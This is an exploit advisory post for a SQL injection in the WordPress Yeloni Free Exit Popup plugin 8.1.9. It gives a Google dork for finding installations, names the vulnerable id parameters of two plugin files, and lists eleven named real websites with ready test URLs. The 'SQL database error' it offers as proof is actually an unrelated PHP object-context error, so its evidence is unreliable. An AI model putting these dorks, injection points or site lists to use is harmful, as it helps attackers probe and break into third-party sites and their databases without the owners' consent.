WordPress Yeloni Free Exit Popup 8.1.9 SQL Injection

`####################################################################  
  
# Exploit Title : WordPress Yeloni Free Exit Popup Plugins 8.1.9 SQL Injection  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 28/01/2019  
# Vendor Homepage : yeloni.com  
# Software Download Link : downloads.wordpress.org/plugin/yeloni-free-exit-popup.zip  
# Software Information Link : wordpress.org/plugins/yeloni-free-exit-popup/  
# Software Version : 8.1.9  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/yeloni-free-exit-popup/wordpress/''  
# Vulnerability Type : CWE-89 [ Improper Neutralization of   
Special Elements used in an SQL Command ('SQL Injection') ]  
  
####################################################################  
  
# Description :  
*************  
  
* Yeloni is a powerful lead generation plugin that converts abandoning visitors on your website  
  
into subscribers using attention grabbing forms that are proven to convert.   
  
Choose from a wide variety of configurations, targetting options and   
  
widget designs to customize your popup.  
  
####################################################################  
  
# Impact :  
**********  
  
* WordPress Yeloni Free Exit Popup Plugins 8.1.9 and other versions is prone to an   
  
SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied   
  
data before using it in an SQL query.  
  
* Exploiting this issue could allow an attacker to compromise the application, read,  
  
access or modify data, or exploit latent vulnerabilities in the underlying database.   
  
If the webserver is misconfigured, read & write access to the filesystem may be possible.  
  
####################################################################  
  
# SQL Injection Exploit :  
***********************  
  
/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=[SQL Injection]  
  
/wp-content/plugins/yeloni-free-exit-popup/wordpress/client-load.php?id=[SQL Injection]  
  
####################################################################  
  
# Example Vulnerable Sites :  
***************************  
  
[+] startadora.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
[+] podfo.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
[+] hviaonline.com/funds/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
[+] interset.digital/site/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
[+] speakerhead.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
[+] sterlingequipmentinc.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
[+] ewan.lublin.pl/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
[+] thequadgroup.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
[+] zenic.co.uk/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
[+] englishxp.co.uk/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
[+] rodoyo.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27  
  
####################################################################  
  
# Example SQL Database Error :   
******************************  
  
Fatal error: Using $this when not in object context in /home/axtvr/public_html  
/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php on line 2  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`